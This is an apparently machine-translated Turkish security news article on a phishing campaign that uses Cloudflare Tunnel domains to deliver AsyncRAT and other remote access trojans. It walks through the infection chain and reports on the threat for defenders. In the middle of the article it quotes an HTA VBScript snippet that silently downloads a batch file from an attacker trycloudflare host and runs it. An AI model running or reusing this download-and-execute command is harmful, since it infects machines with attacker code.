Siber güvenlik uzmanları, çeşitli uzaktan erişim truva atlarını (sıçanlar) dağıtmak için Cloudflare’nin tünel altyapısını kullanan sofistike bir saldırı kampanyası belirlediler.
Şubat 2024’ten bu yana dikkate değer bir esneklik gösteren altyapı, saldırganların kurbanların sistemlerine yetkisiz erişim kazanmasını sağlayan kötü amaçlı dosyalar ve truva atları için bir dağıtım platformu olarak hizmet vermektedir.
Forcepoint, Fortinet, Orange ve Proofpoint dahil güvenlik satıcıları, bu kalıcı tehdidi belgeledi, gelişen doğasını ve dünya çapındaki kuruluşlar üzerindeki artan etkisini vurguladı.
.png
)
Birincil enfeksiyon vektörü, fatura veya sipariş olarak gizlenmiş kötü niyetli ekler içeren aldatıcı kimlik avı e -postaları ile başlar.
Bu e -postalar genellikle yanlış aciliyet yaratır ve meşru görünmek için dövme yanıtları olan fabrikasyon konuşma ipliklerini içerebilir.
Ek, genellikle ikili dosyalara kıyasla görünüşte zararsız doğası nedeniyle e-posta güvenlik ağ geçitlerini sık sık atlayan “Uygulama/Windows-Library+XML” dosya biçimini kullanır.
Açıldığında, bu dosya Cloudflare Tüneli altyapısında barındırılan uzak bir WebDAV kaynağına bir bağlantı kurar.
Sekoia TDR (Tehdit Tespit ve Araştırma) ekip analistleri, dahili olarak “birden fazla sıçan sunmak için Cloudflare Tüneli Altyapısı” olarak adlandırılan bu saldırı altyapısını izliyor.
Analizleri, tespit sistemlerinden kaçınmak için çeşitli gizleme teknikleri kullanan karmaşık bir çok aşamalı enfeksiyon zincirini ortaya koymaktadır.
Bu saldırının karmaşıklığı, tehdit aktörlerinin 2025’te bile modern güvenlik kontrollerini atlamak için yenilikçi yöntemler geliştirmeye devam ettiklerini göstermektedir.
Saldırganlar, “Malavi-Light-Pill-Bolt.trycloudflare.com”, “Player-Time-acturping-th.Trycloudflare.com” ve diğerleri de dahil olmak üzere “Trycloudflare.com” sonek ile alan adlarını kullanıyor.
Bu altyapı, sonuçta tehlikeye atılan sistemlere kalıcı uzaktan erişim sağlayan, potansiyel olarak veri hırsızlığı ve daha fazla ağ uzlaşmasını sağlayan yükler sunar.
Enfeksiyon zinciri mekaniği
Enfeksiyon işlemi, bir kullanıcı PDF belgesi olarak gizlenmiş bir LNK dosyasıyla etkileşime girdiğinde başlar.
Bu kısayol, meşru bir belge açmak yerine, aynı uzak sunucudan bir HTA dosyası yürütür. HTA içeriği, saldırının nasıl ilerlediğini ortaya koyuyor:-
Set oShell = CreateObject("WScript.Shell")
oShell.Run "cmd. exe /c curl -o %temp%\ben.bat https://players-time-corresponding-th.trycloudflare.com/ben.bat && %temp%\ben.bat", 0, false
self. CloseBu komut dosyası, Python’u yükleyen ve şaşkın Python kodunu yürüten bir yarasa dosyasını tetikler, bu da bir sonraki yük aşamasını “notepad.exe” işlemlerine enjekte eder.
.webp)
Kalıcılık için, kötü amaçlı yazılım, iki VBS dosyası ve Windows başlangıç klasörüne yerleştirilmiş başka bir yarasa dosyası ile başlangıç girişleri oluşturur.
Son aşama, bir JPEG görüntüsünden gömülü Base64 yükü ile indirilen bir yükü yansıtıcı bir şekilde yüklemek için PowerShell kullanır.
Bu, sıçanın komut ve kontrol sunucusuyla bağlantısını belirler, genellikle iletişim için “Duckdns.org” gibi dinamik DNS hizmetlerini kullanarak.
.webp)
Enfeksiyon zincirleri (kaynak – sekoia)
Windows-Library dosyaları, LNK dosyaları, HTA yürütme ve Python enjeksiyonunu içeren karmaşık bir çok aşamalı işlem yoluyla asyncrat dağıtan enfeksiyon zincirleri.*
Bu saldırı kampanyasının evrimi, tehdit aktörlerinin tekniklerini güvenlik kontrollerini atlamaya nasıl uyarlayarak, çok katmanlı algılama yaklaşımlarının önemini ve benzer saldırı modelleri için sürekli izlemeyi vurguladığını göstermektedir.
Malware Trends Report Based on 15000 SOC Teams Incidents, Q1 2025 out!-> Get Your Free Copy